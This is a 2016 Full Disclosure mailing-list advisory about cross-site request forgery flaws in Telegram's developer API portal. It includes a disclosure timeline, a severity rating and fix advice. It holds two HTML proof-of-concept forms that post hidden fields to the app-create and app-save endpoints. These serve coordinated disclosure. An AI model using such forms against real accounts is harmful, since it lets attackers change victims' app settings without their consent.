[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Telegram (API) - Cross Site Request Forgery Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-01-27 14:20:47
Message-ID: 56A8D23F.1000300 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Telegram (API) - Cross Site Request Forgery Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1648
Release Date:
=============
2016-01-17
Vulnerability Laboratory ID (VL-ID):
====================================
1648
Common Vulnerability Scoring System:
====================================
3.2
Product & Service Introduction:
===============================
Telegram is a cloud-based instant messaging service that focusses on privacy and multi-platform \
availability. Telegram clients exist for both mobile (Android, iOS, Windows Phone, Ubuntu \
Touch) and desktop systems (Windows, OS X, Linux). Users can send messages and exchange \
photos, videos, stickers and files of any type up to 1.5 GB in size. Telegram also provides \
optional end-to-end encrypted messaging with self-destruct timers. Telegram is run by Telegram \
Messenger LLP and backed by Russian entrepreneur Pavel Durov. Its client-side code is \
open-source software, whereas its server-side code is closed-sourced and proprietary. The \
service also provides APIs to independent developers.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Telegram_%28software%29 )
Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered multiple client-side \
vulnerabilities and a filter bypass issue in the official Telegram (API) for app developers.
Vulnerability Disclosure Timeline:
==================================
2015-11-17: Researcher Notification & Coordination (Amer Lawrence)
2015-11-18: Vendor Notification (Telegram Security Team)
2016-01-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Telegram Messenger LLP
Product: Telegram (API) - App Developers 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple cross site request forgery web vulnerabilities has been discovered in the official \
Telegram (API) for app developers. The vulnerability allows to unauthorized execute application \
functions in connection with client-side performed malicious requests.
Attackers can start Cross site request forgery attack against the auth mechanism of the \
telegram api development to inject a customized android,ios,... app configuration on any \
telegram api developer user. By send malicious link contenting an html code responsible for \
these changes without an access token to protect developers from these attacks. The impact of \
the bug is leaving web application without protection of an access token. Thus allows an \
attacker to perform these type of attacks doing unwanted actions in the user settings.
The security risk of the cross site request forgery web vulnerabilities are estimated as medium \
with a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the csrf \
vulnerabilities requires no privileged iOS system user account and low or medium user \
interaction. Successful exploitation of the vulnerability results in unauthorized execution of \
system specific functions by client-side performed requests to compromise the telegram api dev \
accounts.
Proof of Concept (PoC):
=======================
The cross site request forgery web vulnerabilities can be exploited by a remote attacker \
without privileged web-application user account and low or medium user interaction. For \
security demonstration or to reproduce the vulnerability follow the provided information and \
steps below to continue.
PoC: Video
https://vimeo.com/145911184 (password:vuln4safe)
PoC: #1 CSRF for adding android app or any one else as requested ...
<html>
<body>
<form action="https://my.telegram.org/apps/create" method="POST">
<input type="hidden" name="app_title" value="APP_NAME" />
<input type="hidden" name="app_shortname" value="SHORT_NAME" />
<input type="hidden" name="app_url" value="LINK OF USE" />
<input type="hidden" name="app_platform" value="android" />
<input type="hidden" name="app_desc" value="good one " />
<input type="submit" value="CSRF-Add App" />
</form>
</body>
</html>
PoC: #2 Html code to save the API or changed it ...
<html>
<body>
<form action="https://my.telegram.org/apps/save" method="POST">
<input type="hidden" name="app_title" value="APPNAME" />
<input type="hidden" name="app_shortname" value="SHORTNAME" />
<input type="hidden" name="app_gcm_api_key" value="API KEY" />
<input type="submit" value="Save App api-CSRF" />
</form>
</body>
</html>
Note. This CSRF issue is combined by two folloup request to execute successful function with a \
not expired session by click.
Reference(s):
https://my.telegram.org/apps
Solution - Fix & Patch:
=======================
The vulnerability can be patched by implementation of a secure cookie or access token that \
protects the important online-service functions. Setup a csrf token and implement a secure \
exception to prevent cross site exploitation. Restrict the input and disallow special chars.
Security Risk:
==============
The security risk of the cross site request forgery web vulnerabilities in the offical telegram \
api for app developers is estimated as medium. (CVSS 3.2)
Credits & Authors:
==================
Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic